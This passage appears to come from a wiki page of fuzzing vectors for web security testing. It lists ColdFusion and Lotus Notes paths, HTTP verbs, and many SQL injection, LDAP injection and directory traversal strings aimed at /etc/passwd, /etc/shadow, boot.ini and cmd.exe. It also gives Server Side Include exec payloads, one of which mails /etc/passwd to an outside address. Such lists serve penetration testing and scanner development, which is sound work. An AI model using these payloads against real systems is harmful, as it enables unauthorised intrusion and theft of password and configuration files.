CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
